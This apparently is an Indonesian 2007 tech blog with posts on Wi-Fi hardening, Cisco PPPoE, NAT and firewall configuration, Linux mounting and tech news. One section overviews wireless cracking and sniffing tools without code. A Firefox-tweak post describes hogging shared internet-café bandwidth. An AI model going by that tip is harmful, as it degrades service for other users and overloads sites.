28 December 2007

Wireless...

Most WLAN hardware has gotten easy enough to set up that many users simply plug it in and start using the network without giving much thought to security. Nevertheless, taking a few extra minutes to configure the security features of your wireless router or access point is time well spent. Here are some of the things you can do to protect your wireless network:

1) Secure your wireless router or access point administration interface
Almost all routers and access points have an administrator password that's needed to log into the device and modify any configuration settings. Most devices use a weak default password like "password" or the manufacturer's name, and some don't have a default password at all. As soon as you set up a new WLAN router or access point, your first step should be to change the default password to something else. You may not use this password very often, so be sure to write it down in a safe place so you can refer to it if needed. Without it, the only way to access the router or access point may be to reset it to factory default settings which will wipe away any configuration changes you've made.

2) Don't broadcast your SSID
Most WLAN access points and routers automatically (and continually) broadcast the network's name, or SSID (Service Set IDentifier). This makes setting up wireless clients extremely convenient since you can locate a WLAN without having to know what it's called, but it will also make your WLAN visible to any wireless systems within range of it. Turning off SSID broadcast for your network makes it invisible to your neighbors and passers-by (though it will still be detectible by WLAN "sniffers").

3)Enable WPA encryption instead of WEP
802.11's WEP (Wired Equivalency Privacy) encryption has well-known weaknesses that make it relatively easy for a determined user with the right equipment to crack the encryption and access the wireless network. A better way to protect your WLAN is with WPA (Wi-Fi Protected Access). WPA provides much better protection and is also easier to use, since your password characters aren't limited to 0-9 and A-F as they are with WEP. WPA support is built into Windows XP (with the latest Service Pack) and virtually all modern wireless hardware and operating systems. A more recent version, WPA2, is found in newer hardware and provides even stronger encryption, but you'll probably need to download an XP patch in order to use it.

4) Remember that WEP is better than nothing
If you find that some of your wireless devices only support WEP encryption (this is often the case with non-PC devices like media players, PDAs, and DVRs), avoid the temptation to skip encryption entirely because in spite of it's flaws, using WEP is still far superior to having no encryption at all. If you do use WEP, don't use an encryption key that's easy to guess like a string of the same or consecutive numbers. Also, although it can be a pain, WEP users should change encryption keys often-- preferably every week.

5) Use MAC filtering for access control
Unlike IP addresses, MAC addresses are unique to specific network adapters, so by turning on MAC filtering you can limit network access to only your systems (or those you know about). In order to use MAC filtering you need to find (and enter into the router or AP) the 12-character MAC address of every system that will connect to the network, so it can be inconvenient to set up, especially if you have a lot of wireless clients or if your clients change a lot. MAC addresses can be "spoofed" (imitated) by a knowledgable person, so while it's not a guarantee of security, it does add another hurdle for potential intruders to jump.

6) Reduce your WLAN transmitter power
You won't find this feature on all wireless routers and access points, but some allow you lower the power of your WLAN transmitter and thus reduce the range of the signal. Although it's usually impossible to fine-tune a signal so precisely that it won't leak outside your home or business, with some trial-and-error you can often limit how far outside your premises the signal reaches, minimizing the opportunity for outsiders to access your WLAN.

7) Disable remote administration

Most WLAN routers have the ability to be remotely administered via the Internet. Ideally, you should use this feature only if it lets you define a specific IP address or limited range of addresses that will be able to access the router. Otherwise, almost anyone anywhere could potentially find and access your router. As a rule, unless you absolutely need this capability, it's best to keep remote administration turned off.[practicallynetworked]

27 December 2007

Konfigurasi PPPoE pada Router Cisco 2600

Sekedar berbagi buat kawan-kawan semoga bermanfaat, kebetulan kemarin di kantor ku ISP nya di ganti dari yang dulunya pake modem ADSL sekarang pake yang model fiber optik jadi langsung dari ISPnya ke router kantorku dengan kabel utp masukin ke router, nah terus setting pppoe di router konfigurasinya begini(email dari technical support nya...:):), maklum aku masih belajar)...

! – Masuk ke Global Configuration Mode

Router# config terminal
Router(config)# vpdn enable
Router(config)# vpdn-group pppoe
Router(config-vpdn)# request-dialin
Router(config-vpdn)# protocol pppoe
Router(config-vpdn)# exit

! - Kembali ke Global configuration mode

Router(config)# interface dialer1
Router(config-if)# ip address negotiated
Router(config-if)# encapsulation ppp
Router(config-if)# ip mtu 1492

! - Default untuk mtu interface Ethernet 1500
! - (1492 + PPPoE headers = 1500)

Router(config-if)# ip nat outside
Router(config-if)# dialer pool 1
Router(config-if)# dialer-group 1
Router(config-if)# ppp authentication chap callin
Router(config-if)# ppp chap hostname
Router(config-if)# ppp chap password
Router(config-if)# ppp pap sent−username password

! - Username dan password yaitu account dari service prepaid

Router(config)# dialer-list 1 protocol ip permit
Router(config)# interface fastethernet0/1
Router(config-if)# ip address 10.10.1.0 255.255.255.0
Router(config-if)# ip nat inside
Router(config-if)# exit

! - ini adalah interface dan ip address untuk kearah local LAN

Router(config)# interface fastethernet0/0
Router(config-if)# pppoe enable
Router(config-if)# pppoe-client dial-pool-number 1
Router(config-if)# exit

! - ini adalah interface untuk kearah ISP-nya

Router(config)# ip nat inside source list 1 interface dialer 1 overload
Router(config)# ip classless
Router(config)# ip route 0.0.0.0 0.0.0.0 dialer1
Router(config)# no ip http server
Router(config)# dialer-list 1 protocol ip permit
Router(config)# access-list 1 permit 10.10.0.0 0.0.0.255
Router(config)# exit
Router# copy running-config startup-config

Untuk LAN menggunakan DHCP

Tambahkan konfigurasi di router diatas dengan DHCP Pool

Router# config terminal
Router(config)# ip dhcp pool Internal_LAN
Router(dhcp-config)# network 10.10.11.0 255.255.255.0

! - harus satu segmen dengan LAN Interface (FastEthernet 0/1)
! – internal_LAN adalah nama DHCP pool

Router(dhcp-config)# default-router 10.10.0.4

! – ip address interface LAN (FastEthernet 0/1)

Router(dhcp-config)# ip name-server 192.168.11.58 192.168.11.57

! – konfigurasi agar client mendapatkan DNS secara otomatis


Router(dhcp-config)# ^Z

Router# copy running-config startup-config

THANKYU...U CAN TRY IT!

26 December 2007

NAT [Network Address Translation]

Keterbatasan alamat IPv.4 merupakan masalah pada jaringan global atau Internet. Untuk memaksimalkan penggunakan alamat IP yang diberikan oleh Internet Service Provider (ISP) dapat digunakan Network Address Translation atau NAT. Cisco mengimplementasikan dengan menggunakan RFC 1631. NAT membuat jaringan yang menggunakan alamat lokal (private), alamat yang tidak boleh ada dalam tabel routing Internet dan dikhususkan untuk jaringan lokal/intranet, dapat berkomunikasi ke Internet dengan jalan ‘meminjam’ alamat IP Internet yang dialokasikan oleh ISP.
Dua Tipe NAT Dua tipe NAT adalah Static dan Dinamik yang keduanya dapat digunakan secara terpisah maupun bersamaan.
Statik Translasi Static terjadi ketika sebuah alamat lokal (inside) di petakan ke sebuah alamat global/internet (outside). Alamat lokal dan global dipetakan satu lawan satu secara Statik.
Dinamik NAT dengan Pool (kelompok)
Translasi Dinamik terjadi ketika router NAT diset untuk memahami alamat lokal yang harus ditranslasikan, dan kelompok (pool) alamat global yang akan digunakan untuk terhubung ke internet. Proses NAT Dinamik ini dapat memetakan bebarapa kelompok alamat lokal ke beberapa kelompok alamat global.
NAT Overload
Sejumlah IP lokal/internal dapat ditranslasikan ke satu alamat IP global/outside. Hal ini sangat menghemat penggunakan alokasi IP dari ISP. Sharing/pemakaian bersama satu
alamat IP ini menggunakan metoda port multiplexing, atau perubahan port ke packet outbound.
Kapan sebaiknya NAT Digunakan?
Gunakan NAT Jika:
• Anda membutuhkan koneksi ke Internet dan hosts/komputer-komputer anda tidak mempunyai alamat IP global.
• Anda berganti ke ISP baru dan anda diharuskan menggunakan alamat IP dari ISP baru tersebut untuk jaringan anda.
NAT digunakan untuk menyelesaikan masalah pengalamatan IP
Teknologi NAT memungkinakan alamat IP lokal/’private’ terhubung ke jaringan publik seperti Internet. Sebuah router NAT ditempatkan antara jaringan lokal (inside network) dan jaringan publik (outside network), dan mentranslasikan alamat lokal/internal menjadi alamat IP global yang unik sebelum mengirimkan paket ke jaringan luar seperti Internet.
Dengan NAT, jaringan internal/lokal, tidak akan terlihat oleh dunia luar/internet. IP lokal yang cukup banyak dapat dilewatkan ke Internet hanya dengan melalui translasi ke satu IP publik/global.
Keuntungan menggunakan NAT Jika anda harus merubah alamat IP internal anda, dikarenakan anda berganti ISP atau dua intranet digabungkan (misalnya penggabungan dua perusahaan), NAT dapat digunakan untuk mentranslasikan alamat IP yang sesuai. NAT memungkinkan anda menambah alamat IP, tanpa merubah alamat IP pada hosts atau komputer anda. Dengan demikian akan menghilangkan duplicate IP tanpa pengalamatan kembali host atau komputer anda.

Contoh IP NAT Statik
Router#show ip nat translation
Pro Inside global Inside local Outside local Outside global
--- 156.8.34.1 10.15.0.1 --- ---
--- 156.8.34.2 10.15.0.2 --- ---
--- 156.8.34.3 10.15.0.3 --- ---

Contoh IP NAT Dinamik:
Router#show ip nat translation
Pro Inside global Inside local Outside local Outside global
tcp 143.4.23.1:1098 10.1.0.1:1098 73.4.5.6:23 73.4.5.6:23
tcp 143.4.23.1:1345 10.1.0.2:1345 73.4.5.6:23 73.4.5.6:23
tcp 143.4.23.1:1989 10.1.0.3:1989 73.4.5.7:21 73.4.5.7:21

Contoh Statistik NAT:
Router#show ip nat statistics
Total translations: 1 (0 static, 1 dynamic; 0 extended)
Outside interfaces: Serial0Inside interfaces: Ethernet0Hits: 1 Misses: 0
Expired translations: 2Dynamic mappings:-- Inside Source
access-list 1 pool Ilmukomputer refcount 2 pool Ilmukomputer: netmask 255.255.255.0
start 195.165.2.1 end 195.165.2.254
type generic, total addresses 254, allocated 1 (14%), misses 0

Contoh :
Router#debug ip nat
NAT: s=10.1.0.1->12.1.3.2, d=155.5.5.5 [1]
NAT: s=155.5.5.5, d=12.1.3.2->10.1.0.1 [1]
NAT: s=10.1.0.1->12.1.3.2, d=155.5.5.5 [2]
NAT*: s=155.5.5.5, d=12.1.3.2->10.1.0.1 [2]
!Additional output omitted……………

Untuk melacak atau melihat proses operasi NAT, gunakan perintah debug ip nat [list | detailed].
Pada contoh di atas dapat dijelaskan sebagai berikut :
• Tanda asterisk (*) menunjukkan translasi terjadi dengan “fast path” atau dengan menggunakan “cache”. Paket pertama akan selalu melalui jalur lambat/slow path (process-switched). Paket berikutnya akan melalui jalur cepat (fast path) jika dengan entri “cache”.
• s=10.1.0.1 adalah alamat asal (source address).
• d=155.5.5.5 adalah alamat tujuan (destination address).
• 10.1.0.1->12.1.3.2 menunjukkan bahwa alamat ditranslasikan.
• Nilai dalam tanda kurung adalah nomor identifikasi IP. Informasi ini sangat berguna untuk mencocokkan pasangan paket jika menggunakan alat ukur Sniffer, karena sangat banyak paket yang muncul dalam Sniffer.

Membersihkan Translasi Tabel NAT Berikut perintah untuk membersihkan isi tabel NAT pada Router Cisco:
Perintah
Keterangan
clear ip nat translation *
Membersihkan semua isi tabel NAT
Tanda (*) berarti SEMUA.
clear ip nat translation inside global-ip local-ip [outside local-ip global-ip]
Membersihkan translasi yang berisi sebuah translasi lokal/inside, atau translasi inside dan outside bersamaan.
clear ip nat translation outside local-ip global-ip
Membersihkan sebuah translasi global/outside.
clear ip nat translation protocol inside
Membersihkan sebuah “extended entry”.
Tip :
Jika NAT telah dikonfigur dengan benar, tetapi translasi tidak terjadi, bersihkan isi tabel NAT (clear ip nat translation *), kemudian cek kembali translasi yang terjadi.
source from : mudji basuki

17 December 2007

Belajar Linux Yuk...

Cara mounting hardisk type FAT/FAT32 (pastisinya windows).

Pastikan hardisk di kenali komputer, bisa dicek pake bios atau dengan Gnome Partition Editor di Ubuntu. Jika FAT/FAT32 tadi berada di partisi lain dalam satu hardisk dengan Ext3 Ubuntu (sda), Anggap saja lokasi pastisi windows (FAT/FAT32) berada di /dev/sda3 (seperti hardisk saya tadi). Folder pemasangan(Local mount folder): /media/windows.
Buka konsol/terminal
Ketik/salin –> sudo mkdir /media/windows, jika diminta password isikan saja password yag anda punya-> enter.
setelah itu:
Ketik/salin –> sudo cp /etc/fstab /etc/fstab_backup <– enter
berikutnya:
Ketik atau kopikan –> gksudo gedit /etc/fstab <– enter (akan terbuka gedit = semacam notepad)
Berpindah ke gedit
Ketik/salin –>/dev/sda3 /media/windows vfat iocharset=utf8,umask=000 0 0
Mengetiknya di bagian bawah teks dalam gedit tadi. Simpan perubahan yang dibuat, terus tutup gedit ini.

Cara me-remount /etc/fstab (memasang partisi lagi) tanpa rebooting komputer
Ketik atau kopikan ke konsol/terminal–> sudo mount -a
Selesai, selanjutnya coba explore isi hardisk dengan fasilitas yang ada, jika data di partisi FAT/FAT32 terbaca artinya berhasil me-mount-nya itu.

Mengenai masalah loading windows partisi di linux
[belajar@localhost]# mount /dev/hda1 -t vfat /mnt/win, jangan lupa sebelum shutdown ketik "unmount"
[blelajar@localhost]# umount /mnt/win.

Boot disk
[belajar@localhost]# mkbootdisk --device /dev/fd0 2.2.x-yy, dimana "2.2.x-yy" adalah versi dari kernel.
selanjutnya cara mengenali versi kernelnya, ketikkan saja "uname -a" di consolenya.

2 be continyu...dari berbagai sumber

03 December 2007

Search Engine...

Situs "search engine" selalu dipakai para pengguna internet untuk mencari arti atau uraian dalam dari sebuah kata kunci. Search engine dan direktori-direktorinya tidaklah seragam antara satu dengan lainnya. Perbedaannya terletak pada cara membuat daftar hasil kompilasinya.

Search engine dan Direktori

Search Engines: Search engines, seperti HotBot, menulis daftarnya secara otomatis. Search engines mengakses situs-situs web, sedangkan pengguna internet mencari pada apa yang sudah mereka temukan.

Jika anda mengubah situs web anda, search engines bahkan dapat menemukan situs anda itu. Namun cara anda menulis pada situs anda seperti menuliskan "page titles", "body copy" dan elemen-elemen lainnya amatlah mempengaruhi penulisan daftar pada search engine.

Direktori: Sebuah direktori seperti Yahoo, amatlah tergantung pada orang yang menulis daftarnya. Ketika anda mengirimkan deskripsi situs anda, atau ketika editor menuliskan review situsnya. Maka search engine hanya akan mengerjakan hasil pencocokan (penyamaan) tulisan anda itu dengan kata kunci yang dikirimkan oleh seorang pengguna internet melalui search engine.

Mengubah situs anda tidak mempengaruhi peringkat anda dalam daftar pencarian search engine. Alangkah baiknya dipikirkan ketika menulis homepage anda, bahwa situs yang baik isinya, akan merupakan situs yang paling sering dilihat orang daripada situs yang kurang berguna.

Hybrid Search Engines: Beberapa search engines menggunakan direktori-direktori yang saling berhubungan. Ketika mendaftarkan situs anda di sebuah search engine, keberhasilan anda amat tergantung pada kemujuran dan kualitas. Terkadang anda dapat memasukan "(submi)t" situs anda pada search engine untuk direview. Tetapi tidak ada jaminan bahwa situs anda akan otomatis direview oleh pengelola search engine. Pengelola search engine selalu memperhatikan situs-situs yang mendaftar pada tempat yang telah disediakan. Dengan demikian sebaiknya anda lihat dulu tempat yang telah ditentukan oleh pengelola search engine tersebut.

Bagian-bagian dari sebuah search engine

Search engines memiliki tiga komponen penting. Pertama elemen yang disebut laba-laba (spider) juga disebut crawler. Elemen spider mengerjakan akses (kunjungan) ke situs-situs web, membaca isinya, dan kemudian mengikuti link-link yang ada pada situs. Elemen ini mengakses situs-situs web secara periodik satu atau dua bulan untuk melihat apakah ada perubahan dari situs-situs tersebut.

Tiap-tiap yang dijumpai elemen spider selalu akan dituliskan dalam sebuah index. Index merupakan elemen kedua dari search engine. Index sering pula disebut katalog yang mirip sebuah buku raksasa, berisikan copy dari setiap situs yang dikunjungi elemen spider. Jika elemen spider menemukan perubahan dari sebuah situs web, maka informasi dari situs web yang ada dalam katalog ini segera diperbaiki (up date).

Kadang-kadang diperlukan sebuah penulisan halaman baru sesuai dari temuan elemen spider pada situs web. Sehingga ada kemungkinan informasi baru dari sebuah situs web yang telah diakses oleh elemen spider tidak tertulis dalam index katalog.

Software earch engine adalah elemen ketiga. Program inilah yang memilah ribuan data dalam katalog yang berisi copy halaman-halaman situs web tadi, dan mencocokannya sesuai permintaan user internet, dan menampilkan datanya ke layar monitor dan menyusunnya dalam daftar sesuai dengan ranking-nya.

Search Engines Umum: ini serupa tapi tak sama.

Setiap search engine memiliki komponen-komponen seperti disebut diatas. Namun ada perbedaan dalam pengaturannya. Karena itulah hasil pencarian dari sebuah search engine sering berbeda. Perbedaan yang signifikan dari search engine umum secara ringkas bisa dilihat dalam situs Search Engine Features Page. Uraian ini ditulis hanya untuk membantu mendapatkan gambaran dari berbagai artikel , reviews, buku, riset, tips dari berbagai search engine.[http://www.ai3.itb.ac.id]

Tools Wireless Hacking

Locating a wireless network is the first step in trying to exploit it. There are two tools that are commonly used in this regard:

Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.


(NetStumbler Screenshot)

Kismet – One of the key functional elements missing from NetStumbler is the ability to display Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you should realize that Access Points are routinely broadcasting this info; it just isn’t being read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical in finding wireless networks.


(Kismet Screenshot)

Attaching to the Found Wireless Network

Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t using any type of authentication or encryption security, you can simply connect to the SSID. If the SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network is using authentication and/or encryption, you may need one of the following tools.

Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional tools and strategies that can be used to force the generation of traffic on the wireless network to shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.


(Screenshot of Airsnort in Action)

CowPatty – This tool is used as a brute force tool for cracking WPA-PSK, considered the “New WEP” for home Wireless Security. This program simply tries a bunch of different options from a dictionary file to see if one ends up matching what is defined as the Pre-Shared Key.


(Cowpatty Options Screenshot)

ASLeap – If a network is using LEAP, this tool can be used to gather the authentication data that is being passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the authentication like other “real” EAP types, which is the main reason why LEAP can be broken.


(Asleap Options Screenshot)

Sniffing Wireless Data

Whether you are directly connected to a wireless network or not, if there is wireless network in range, there is data flying through the air at any given moment. You will need a tool to be able to see this data.

Wireshark (formerly Ethereal) – While there has been much debate on the proper way to pronounce this utility, there is no question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.


(Screenshot of Ethereal in Action)


(Yahoo IM Session being sniffed in Ethereal)

The aforementioned utilities, or similar ones, will be necessities in your own wireless security toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab environment. And cost is no excuse as all of these tools are available freely on the Internet.[http://www.ethicalhacker.net]

07 November 2007

Lalu Lintas Internet Indonesia mulai di awasi tahun 2008

Lalu lintas Internet di Indonesia akan diawasi secara penuh mulai Januari 2008 mendatang oleh lembaga pengawas internet, Indonesia Security Response Internet Infrastructure (ID-SIRTII).

Ketua Pelaksana ID-SIRTII Richardus Eko Indrajit mengungkapkan, pihaknya saat ini masih menyiapkan infrastruktur jaringan dan database untuk keperluan penyimpanan log file dan pengawasan trafik konten yang diperkirakan selesai akhir Desember tahun ini.

"Desember mulai kami ujicobakan sehingga Januari tahun depan database dan trafik monitoring sudah bisa berjalan," ujarnya di sela seminar tentang ID-SIRTII di Hotel Bidakara, Jakarta, Rabu (31/10/2007).

Wakil Ketua ID-SIRTII Muhammad Salahuddien menambahkan, server ID-SIRTII yang tengah dibangun akan menyimpan data log file pengguna Internet seluruh dengan kapasitas sebesar enam tera bytes (TB). Server tersebut yang dibangun oleh PT Sigma Cipta Caraka terhubung ke pengguna Internet, misalnya dari perusahaan dan perkantoran, melalui penyelenggara jasa Internet (ISP).

"Kami hanya akan mengawasi trafik dari ISP resmi yang berizin dari Ditjen Postel sementara PJI yang mengambil bandwidth dari luar negeri secara ilegal menjadi tanggung jawab lembaga pengawas di negara tempat Internet Protocol atau bandwidth itu berasal," jelasnya.

ID-SIRTII, menurut Eko, akan menjalin kerja sama strategis dengan lembaga serupa di negara-negara lain sehinga bila terdapat serangan dari luar negeri maka dapat diselesaikan antarlembaga.

"Kami tidak memiliki kewenangan melakukan tindakan hukum kepada pelaku kejahatan dunia maya. Kami hanya akan menyampaikan data dan fakta kepada pihak yang berwenang seperti kepolisian, kejaksaan, dan Ditjen Postel. Biar mereka yang menentukan definisinya," ujar dia.

Salahuddien menandaskan, dengan server yang dimiliki ID-SIRTII nantinya akan sanggup untuk mengawasi trafik Internet di Indonesia yang setiap harinya bisa mencapai 3 Giga bytes per detik (Gbps) dan 4 Gbps pada masa-masa tertentu seperti Pemilu.

Sumber: detikinet.com

30 October 2007

PESTA BLOGGER 2007

Assalamu'alaikum Wr.Wb.

Dengan ini saya ingin menyampaikan satu dua atau tiga patah kata, yang mana pada 27 Oktober 2007 kemaren sekaligus di tetapkan sebagai hari BLOGGER NASIONAL oleh Menteri DEPKOMINFO Bpk. M. Nuh di BlitzMegaplex telah di selenggarakan PESTA BLOGGER 2007. Thanks buat para panitia penyelenggara semoga acara ini berkelanjutan dari tahun ke tahun...resmi banget sich gw kayak Pak Lurah lagi ngasih pengarahan aj nih, wow yang dateng kemarin +/-500 blogger ada yang dari bandung, makassar(angingmammiri.org), KL, singapore,etc. pokoknya banyak dech...asyik juga sih biasanya ketemu nya kan di dunia maya, dengan adanya acara ini temen2 semua dapat ketemu langsung alias kopi darat(jadul banget istilahnya)...saling kenalan satu sama lain tuker2an alamat blog...pokoknya otre lah, buat temen2 blog semua salam kenal ya soalnya kemarin ngga sempet kenalan atu2 bnyak banget orang nye...yo weslah cukup semanten mawon nggeh,sedoyo lepat kula nyuwun pangapunten,monggo...c u @ PESTA BLOGGER 2008...cayo BLOGGER INDONESIA

Dan para pemenangnya adalah:
Kategori online marketing dan sales: Media Ide Bajing Loncat
Kategori women’s issues: Fashionese Daily
Kategori blog teknologi: Ilmu Komputer.com
Kategori blog personal: Istri Bawel
Kategori blog selebriti: Jennie S. Bev
Kategori current issues: Perspektif. net
Kategori bridge blogging: Enda Nasution
Kategori pendatang baru terbaik: Lidya Wangsa
Pemenang untuk kategori pendatang baru terbaik mendapatkan hadiah berupa Nokia N73 Music Edition.

Wassalamu'alaikum Wr.Wb.

07 September 2007

Cisco Router Firewall

To create a firewall on Cisco router one should define one or several access lists and associate them with interfaces. Access list is a set of traffic filtering rules. Rule specifies traffic source and destination and a policy to apply to this kind of traffic (permit or deny). Each access list has a numeric ID. We are interested in so called extended access lists, numbered from 100 to 199 inclusive.

To view the status of access lists on our router, run the following command:

Show access-list

The command output may look as follows:

Num Src Addr Src Port Dst Addr Dst Port Prot Policy
100 10.10.1.3 any 10.20.1.5 ftp tcp deny
100 any any any any ip permit


As we can see access list number 100 denies ftp traffic from host 10.10.1.3 to host 10.20.1.5 and allows all other traffic.

Let’s define our own access list to block web traffic from 192.116.1.50 to 10.10.10.146 and allow all other. Before we do that, let’s check that Http to 10.10.10.10 indeed works. Start the browser and type the address 10.10.10.146 :

If you get a web page it works

Now lets define our access list.

Conf t
Access-list 110 deny tcp host 192.116.1.50 host 10.10.10.146 eq www
Access-list 110 permit ip any any
Exit

We gave our access list number 110. You can select any other in the range 100-199, provided that access list with such number does nor exist.


Now let’s associate interface FastEthernet0/0 with this access list:

Conf t
Interface FastEthernet0/0
Ip access-group 110 in
Exit


This command instructs interface FastEthernet0/0 to filter all incoming traffic according to the rules defined in access list 110.

Click on refresh web page. You shouldn’t get any page display. if you get any response try to delete local cache files. The ping should work. Let’s disable our firewall, by running

Conf t
Interface FastEthernet0/0
No Ip access-group 110 in
Exit


Click on refresh web page. It should succeed this time.

You can define more complex firewalls using the above programs. For a complete set of options, please refer to a document titled “Cisco Router Monitoring and configuration utilities. User Manual”

20 August 2007

Mozilla Again...

monopoli bandwith

1). Buka Browser Mozilla Firefox
2). Pada Address Bar Ketik : about:CONFIG
3). Cari string di bawah ini : ( pastikan semua srting dibawah "TRUE")
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih "Toggle"
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False
4). buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan [/b]NEW>>INTEGER[/b]
5). Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6). Kemudian REFRESH atau Tekan F5
7). Pada Address Bar Ketik : about:BLANK
Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
9). Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan
10).Kemudian Tekan OK Lalu REFRESH ( F5 )
11).Masuk Ke Link Ini :
https://addons.mozilla.org/extension...firefox&id=125
atau :
https://addons.mozilla.org/extension...ltered=firefox
12).Download Software SwitchProxy Tool Versi 1.3.4
13).Setelah Selesai Jangan Tekan Tombol UPDATE
14).Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
15).Tutup Semua Browser Mozilla FireFox,
16).Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi
17).Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.
Sekarang Browser Mozilla Siap Untuk Digunakan…….
:: Message ::
-- Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
-- Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang Anda Pakai
-- Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND / VSAT

Klik 2x di settingan dan masukin angka-angka ini - untuk true / false booleans – mereka bakal ganti otomatis begitu klik 2x
Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 64
network.http.max-connections-per-server – 20
network.http.max-persistent-connections-per-proxy – 10
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300
network.http.request.max-start-delay = 0
nglayout.initialpaint.delay = 0
If nglayout.initialpaint.delay doesnt exist, Right click, new integer.


Optional:

Code:
network.http.max-persistent-connections-per-proxy = 10
network.http.proxy.pipelining = true
network.http.proxy.version = 1.0


Tutup mozilla trus jalanin lagi.
Sekarang Mozilla lo mengGILAAAAAAAAAA!!!.

WARNING:
Settingan ini bikin lo ngedonlot situs dengan amat KESURUPAN, BUT bikin Overload luar biasa ke situs yang lo tuju!
Ga bermaksud apa-apa selain kompi lain yang dapat share internet bakal lemod ABEZZZ gara-gara lo sedot benwidnya!

Next tip:
Disable IPv6 di Firefox buat bikin sejuk kecepatan load page lo!!........ soalnya hamper semua site dah ga make IPv4...........

Buka Firefox.........ketik “about:config” (enter)
cari :Network.dns.disableIPv6

Klik 2x buat ngerubah jadi 'true' trus restart Firefox.
Lo bakal mempercepat akses browsing.........page per page.
Sekarang Firefox bener-bener dah GILAAAAAAAA buat lo!...
nglayout.initialpaint.delay bisa dirubah yg mana aja...bisa 0 bisa 300 ada juga yg set 30...tergantung kebutuhan.....coba 0 dulu...baru nanti kl ga ada perubahan naikan ke 300 atau nilai yg dirasa memuaskan

For ADSL:
Code:
1. Type: about:config
2. Set:
network.http.max-connections : 64
network.http.max-connections-per-server : 21
network.http.max-persistent-connections-per-server : 8
network.http.pipelining : true
network.http.pipelining.maxrequests : 100
network.http.proxy.pipelining : true


3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves. (Copy from TvM)[/code]

For Dial_ip:
Code:
browser.cache.disk_cache_ssl : true
browser.xul.error_pages.enabled : true
content.interrupt.parsing : true
content.max.tokenizing.time : 3000000
content.maxtextrun : 8191
content.notify.backoffcount : 5
content.notify.interval : 750000
content.notify.ontimer : true
content.switch.threshold : 750000
network.http.max-connections : 32
network.http.max-connections-per-server : 8
network.http.max-persistent-connections-per-proxy : 8
network.http.max-persistent-connections-per-server : 4
network.http.pipelining : true
network.http.pipelining.maxrequests : 8
network.http.proxy.pipelining : true
nglayout.initialpaint.delay : 750
plugin.expose_full_path : true
signed.applets.codebase_principal_support : true

All About Mozilla Firefox

Cable Dsl
1. Type "about:config" into the address bar and hit enter. Scroll down and look for the following entries:

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"

set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.


More options:

For ADSL:
1. Type: about:config
2. Set:
network.http.max-connections : 64
network.http.max-connections-per-server : 21
network.http.max-persistent-connections-per-server : 8
network.http.pipelining : true
network.http.pipelining.maxrequests : 100
network.http.proxy.pipelining : true

3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves. (this tutorial from Kaskus Internet&Hacking Forum)

...Linux Corner...

Perintah-perintah di linux

1. Buat Boot disk
[blablabla@localhost]# mkbootdisk --device /dev/fd0 2.2.x-yy
"2.2.x-yy" adalah versi dari kernel.
cara ngliatnya
ketik "uname -a" di console.

2. Partisi windows di linux
[blablabla@localhost]# mount /dev/hda1 -t vfat /mnt/win
Selanjutnya ketik "unmount"
[blablabla@localhost]# umount /mnt/win

to be continued...

02 August 2007

"Special Operation 85: Hostage Rescue" Iran PC Game...

Iran on Monday launched a computer game with a strong political message that mixes the standoff over its nuclear programme, the mystery of missing diplomats in Lebanon and its hatred of Israel.

Players of the game "Special Operation 85: Hostage Rescue" play the part of a special agent battling to release captured Iranian diplomats and nuclear scientists from the clutches of his US and Israeli foes.

